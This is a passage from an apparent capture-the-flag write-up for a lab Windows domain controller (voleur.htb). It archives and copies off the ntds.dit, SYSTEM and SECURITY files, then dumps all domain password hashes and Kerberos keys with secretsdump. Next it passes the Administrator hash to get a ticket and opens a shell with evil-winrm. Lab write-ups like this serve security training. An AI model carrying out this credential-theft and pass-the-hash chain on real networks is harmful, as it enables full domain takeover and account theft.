tar -czf dpapi_files.tar.gz ntds.dit SYSTEM SECURITY
 
# Local machine
$ scp -i id_rsa -P 2222 svc_backup@dc.voleur.htb:/home/svc_backup/dpapi_files.tar.gz . && tar -xvzf dpapi_files.tar.gz
  • Extract the hashes offline with secretsdump.py (LOCAL mode, no connection to the DC needed)
$ secretsdump.py \
  -system SYSTEM \
  -security SECURITY \
  -ntds 'ntds.dit' \
  LOCAL
 
Impacket v0.13.0.dev0+20250605.14806.5f78065 - Copyright Fortra, LLC and its affiliated companies
 
[*] Target system bootKey: 0xbbdd1a32433b87bcc9b875321b883d2d
[*] Dumping cached domain logon information (domain/username:hash)
[*] Dumping LSA Secrets
[*] $MACHINE.ACC
$MACHINE.ACC:plain_password_hex:759d6c7b27b4c7c4feda8909bc656985b457ea8d7cee9e0be67971bcb648008804103df46ed40750e8d3be1a84b89be42a27e7c0e2d0f6437f8b3044e840735f37ba5359abae5fca8fe78959b667cd5a68f2a569b657ee43f9931e2fff61f9a6f2e239e384ec65e9e64e72c503bd86371ac800eb66d67f1bed955b3cf4fe7c46fca764fb98f5be358b62a9b02057f0eb5a17c1d67170dda9514d11f065accac76de1ccdb1dae5ead8aa58c639b69217c4287f3228a746b4e8fd56aea32e2e8172fbc19d2c8d8b16fc56b469d7b7b94db5cc967b9ea9d76cc7883ff2c854f76918562baacad873958a7964082c58287e2
$MACHINE.ACC: aad3b435b51404eeaad3b435b51404ee:d5db085d469e3181935d311b72634d77
[*] DPAPI_SYSTEM
dpapi_machinekey:0x5d117895b83add68c59c7c48bb6db5923519f436
dpapi_userkey:0xdce451c1fdc323ee07272945e3e0013d5a07d1c3
[*] NL$KM
 0000   06 6A DC 3B AE F7 34 91  73 0F 6C E0 55 FE A3 FF   .j.;..4.s.l.U...
 0010   30 31 90 0A E7 C6 12 01  08 5A D0 1E A5 BB D2 37   01.......Z.....7
 0020   61 C3 FA 0D AF C9 94 4A  01 75 53 04 46 66 0A AC   a......J.uS.Ff..
 0030   D8 99 1F D3 BE 53 0C CF  6E 2A 4E 74 F2 E9 F2 EB   .....S..n*Nt....
NL$KM:066adc3baef73491730f6ce055fea3ff3031900ae7c61201085ad01ea5bbd23761c3fa0dafc9944a0175530446660aacd8991fd3be530ccf6e2a4e74f2e9f2eb
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Searching for pekList, be patient
[*] PEK # 0 found and decrypted: 898238e1ccd2ac0016a18c53f4569f40
[*] Reading and decrypting hashes from ntds.dit
Administrator:500:aad3b435b51404eeaad3b435b51404ee:e656e07c56d831611b577b160b259ad2:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DC$:1000:aad3b435b51404eeaad3b435b51404ee:d5db085d469e3181935d311b72634d77:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:5aeef2c641148f9173d663be744e323c:::
voleur.htb\ryan.naylor:1103:aad3b435b51404eeaad3b435b51404ee:3988a78c5a072b0a84065a809976ef16:::
voleur.htb\marie.bryant:1104:aad3b435b51404eeaad3b435b51404ee:53978ec648d3670b1b83dd0b5052d5f8:::
voleur.htb\lacey.miller:1105:aad3b435b51404eeaad3b435b51404ee:2ecfe5b9b7e1aa2df942dc108f749dd3:::
voleur.htb\svc_ldap:1106:aad3b435b51404eeaad3b435b51404ee:0493398c124f7af8c1184f9dd80c1307:::
voleur.htb\svc_backup:1107:aad3b435b51404eeaad3b435b51404ee:f44fe33f650443235b2798c72027c573:::
voleur.htb\svc_iis:1108:aad3b435b51404eeaad3b435b51404ee:246566da92d43a35bdea2b0c18c89410:::
voleur.htb\jeremy.combs:1109:aad3b435b51404eeaad3b435b51404ee:7b4c3ae2cbd5d74b7055b7f64c0b3b4c:::
voleur.htb\svc_winrm:1601:aad3b435b51404eeaad3b435b51404ee:5d7e37717757433b4780079ee9b1d421:::
[*] Kerberos keys from ntds.dit
Administrator:aes256-cts-hmac-sha1-96:f577668d58955ab962be9a489c032f06d84f3b66cc05de37716cac917acbeebb
Administrator:aes128-cts-hmac-sha1-96:38af4c8667c90d19b286c7af861b10cc
Administrator:des-cbc-md5:459d836b9edcd6b0
DC$:aes256-cts-hmac-sha1-96:65d713fde9ec5e1b1fd9144ebddb43221123c44e00c9dacd8bfc2cc7b00908b7
DC$:aes128-cts-hmac-sha1-96:fa76ee3b2757db16b99ffa087f451782
DC$:des-cbc-md5:64e05b6d1abff1c8
krbtgt:aes256-cts-hmac-sha1-96:2500eceb45dd5d23a2e98487ae528beb0b6f3712f243eeb0134e7d0b5b25b145
krbtgt:aes128-cts-hmac-sha1-96:04e5e22b0af794abb2402c97d535c211
krbtgt:des-cbc-md5:34ae31d073f86d20
voleur.htb\ryan.naylor:aes256-cts-hmac-sha1-96:0923b1bd1e31a3e62bb3a55c74743ae76d27b296220b6899073cc457191fdc74
voleur.htb\ryan.naylor:aes128-cts-hmac-sha1-96:6417577cdfc92003ade09833a87aa2d1
voleur.htb\ryan.naylor:des-cbc-md5:4376f7917a197a5b
voleur.htb\marie.bryant:aes256-cts-hmac-sha1-96:d8cb903cf9da9edd3f7b98cfcdb3d36fc3b5ad8f6f85ba816cc05e8b8795b15d
voleur.htb\marie.bryant:aes128-cts-hmac-sha1-96:a65a1d9383e664e82f74835d5953410f
voleur.htb\marie.bryant:des-cbc-md5:cdf1492604d3a220
voleur.htb\lacey.miller:aes256-cts-hmac-sha1-96:1b71b8173a25092bcd772f41d3a87aec938b319d6168c60fd433be52ee1ad9e9
voleur.htb\lacey.miller:aes128-cts-hmac-sha1-96:aa4ac73ae6f67d1ab538addadef53066
voleur.htb\lacey.miller:des-cbc-md5:6eef922076ba7675
voleur.htb\svc_ldap:aes256-cts-hmac-sha1-96:2f1281f5992200abb7adad44a91fa06e91185adda6d18bac73cbf0b8dfaa5910
voleur.htb\svc_ldap:aes128-cts-hmac-sha1-96:7841f6f3e4fe9fdff6ba8c36e8edb69f
voleur.htb\svc_ldap:des-cbc-md5:1ab0fbfeeaef5776
voleur.htb\svc_backup:aes256-cts-hmac-sha1-96:c0e9b919f92f8d14a7948bf3054a7988d6d01324813a69181cc44bb5d409786f
voleur.htb\svc_backup:aes128-cts-hmac-sha1-96:d6e19577c07b71eb8de65ec051cf4ddd
voleur.htb\svc_backup:des-cbc-md5:7ab513f8ab7f765e
voleur.htb\svc_iis:aes256-cts-hmac-sha1-96:77f1ce6c111fb2e712d814cdf8023f4e9c168841a706acacbaff4c4ecc772258
voleur.htb\svc_iis:aes128-cts-hmac-sha1-96:265363402ca1d4c6bd230f67137c1395
voleur.htb\svc_iis:des-cbc-md5:70ce25431c577f92
voleur.htb\jeremy.combs:aes256-cts-hmac-sha1-96:8bbb5ef576ea115a5d36348f7aa1a5e4ea70f7e74cd77c07aee3e9760557baa0
voleur.htb\jeremy.combs:aes128-cts-hmac-sha1-96:b70ef221c7ea1b59a4cfca2d857f8a27
voleur.htb\jeremy.combs:des-cbc-md5:192f702abff75257
voleur.htb\svc_winrm:aes256-cts-hmac-sha1-96:6285ca8b7770d08d625e437ee8a4e7ee6994eccc579276a24387470eaddce114
voleur.htb\svc_winrm:aes128-cts-hmac-sha1-96:f21998eb094707a8a3bac122cb80b831
voleur.htb\svc_winrm:des-cbc-md5:32b61fb92a7010ab
[*] Cleaning up...
  • Get an Administrator TGT from the NT hash and connect with it over Kerberos
$ getTGT.py -dc-ip $IP -hashes :e656e07c56d831611b577b160b259ad2 voleur.htb/administrator
 
Impacket v0.13.0.dev0+20250605.14806.5f78065 - Copyright Fortra, LLC and its affiliated companies
[*] Saving ticket in administrator.ccache
 
$ export KRB5CCNAME=administrator.ccache
 
$ evil-winrm -i DC.voleur.htb -r voleur.htb
 
*Evil-WinRM* PS C:\Users\Administrator\Documents> dir ../Desktop
 
 
    Directory: C:\Users\Administrator\Desktop
 
 
Mode                 LastWriteTime         Length Name
----                 -------------         ------ ----
-a----         1/29/2025   1:12 AM           2308 Microsoft Edge.lnk
-ar---          7/6/2025  12:40 AM             34 root.txt